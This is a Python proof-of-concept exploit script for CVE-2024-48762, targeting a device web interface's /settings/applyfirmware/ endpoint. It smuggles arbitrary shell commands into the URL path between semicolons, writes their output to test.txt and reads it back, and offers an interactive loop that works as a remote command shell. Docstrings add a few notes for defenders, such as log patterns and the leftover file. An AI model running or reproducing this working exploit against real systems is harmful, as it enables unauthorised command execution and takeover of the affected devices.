import requests
import argparse
import time
def poc(url, command):
    """Issue the CVE-2024-48762 proof-of-concept request and return the captured output.

    Two GET requests are made against ``url``: the first embeds ``command``
    in a ``/settings/applyfirmware/`` path with its output redirected to
    ``test.txt``; the second fetches ``{url}/test.txt`` after a short pause.

    Args:
        url: Base URL including scheme, e.g. ``http://host:port``.
        command: Text placed between the two ``;`` separators of the path.

    Returns:
        The body of the ``test.txt`` response as text.

    Notes for defenders:
        * The first request's path has the form
          ``/settings/applyfirmware/;<text>>test.txt;/false``; shell
          metacharacters under that path are a pattern to search for in
          the device's web access logs.
        * Nothing in this script removes ``test.txt``, so a leftover
          ``test.txt`` served at the site root is a residual artefact of
          a run.
        * ``verify=False`` turns off TLS certificate verification, and no
          ``timeout`` is passed, so either request can block indefinitely.
    """
    # Host header value: everything after the first "//" up to the first
    # ":", so an explicit port in `url` is not carried into the header.
    host_part = url.split("//")[1].split(":")[0]
    request_headers = {"Host": host_part}

    trigger = f"{url}/settings/applyfirmware/;{command}>test.txt;/false"
    requests.get(url=trigger, headers=request_headers, verify=False)

    # Fixed pause before reading the output file back.
    time.sleep(0.5)

    # Read back the file the redirect wrote.
    output = requests.get(
        url=f"{url}/test.txt", headers=request_headers, verify=False
    )
    return output.text
def interactive_mode(url):
    """Print the banner, then relay each typed line to ``poc`` until ``exit``.

    Every line read from standard input is passed unchanged to
    ``poc(url, line)`` and the returned text is printed. The loop ends when
    the line, compared case-insensitively, equals ``exit``.

    Args:
        url: Base URL forwarded to ``poc`` on every iteration.
    """
    banner = r'''
______ ______ ___ ___ ___ ____ ____ ___ ________ ___
/ ___/ | / / __/___|_ |/ _ \|_ / / /____/ / /( _ )_ / __/|_ |
/ /__ | |/ / _//___/ __// // / __/_ _/___/_ _/ _ |/ / _ \/ __/
\___/ |___/___/ /____/\___/____//_/ /_/ \___//_/\___/____/
CVE-2024-48762 By XU17
'''
    print(banner)

    while True:
        entered = input('cmd >>> ')
        if entered.lower() == 'exit':
            return
        # Each line triggers the full request pair inside poc().
        print(poc(url, entered))
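def main():
    """Parse the command line and dispatch to interactive or single-command mode.

    ``-u/--url`` is required. ``-i/--interactive`` takes precedence over
    ``-c/--command``; when neither is given the help text is printed.
    """
    parser = argparse.ArgumentParser(description="POC for ROxKI vulnerability")
    # The example host comes from the RFC 5737 documentation range
    # (TEST-NET-1), so the help text does not name a routable system.
    parser.add_argument(
        "-u",
        "--url",
        required=True,
        help="Base URL to test (e.g., http://192.0.2.10:8004)",
    )
    parser.add_argument("-c", "--command", help="Command to execute (e.g., whoami)")
    parser.add_argument(
        "-i",
        "--interactive",
        action="store_true",
        help="Enter interactive command mode",
    )
    args = parser.parse_args()

    if args.interactive:
        interactive_mode(args.url)
    elif args.command:
        print(poc(args.url, args.command))
    else:
        parser.print_help()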
# Run the command-line entry point only when executed as a script.
if __name__ == "__main__":
    main()
# Usage:
# Single-command mode:
# bash
# python CVE-2024-48762.py -u http://example.com -c "whoami"
# Interactive mode:
# bash
# python CVE-2024-48762.py -u http://example.com -i
# In interactive mode you can keep entering commands until you type "exit" to quit.